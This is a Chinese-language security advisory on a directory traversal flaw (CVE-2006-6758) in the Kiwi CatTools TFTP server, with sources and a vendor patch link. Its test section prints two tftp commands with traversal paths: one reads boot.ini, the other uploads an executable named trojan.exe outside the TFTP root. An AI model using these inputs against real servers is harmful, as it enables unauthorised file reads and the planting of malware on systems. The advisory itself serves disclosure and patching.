发布日期：2007-02-08
更新日期：2007-02-12

受影响系统：

Kiwi CatTools < 3.2.0 beta

不受影响系统：

Kiwi CatTools 3.2.0 beta

描述：

---

BUGTRAQ  ID: 22490
CVE(CAN) ID: CVE-2006-6758

Kiwi CatTools是一个管理网络设备如路由器、交换机与防火墙的工具。

CatTools TFTP服务器处理请求时存在输入验证漏洞，远程攻击者可能利用此漏洞遍历服务器目录访问任意文件。

CatTools TFTP服务器没有正确检查请求文件路径中的目录遍历串，允许远程攻击者通过特制的目录遍历序列向TFTP根目录以外的任意位置上传或下载任意文件。

<*来源：Nicob （nicob@nicob.net）
  
  链接：http://secunia.com/advisories/24103/
        http://marc.theaimsgroup.com/?l=bugtraq&m=117097429127488&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

tftp -i 10.11.12.13 GET a//..//..//..//..//..//boot.ini
tftp -i 10.11.12.13 PUT foo.exe a//..//trojan.exe

建议：

---

厂商补丁：

Kiwi
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.kiwisyslog.com/cattools-info.php

浏览次数：3753
严重程度：0（网友投票）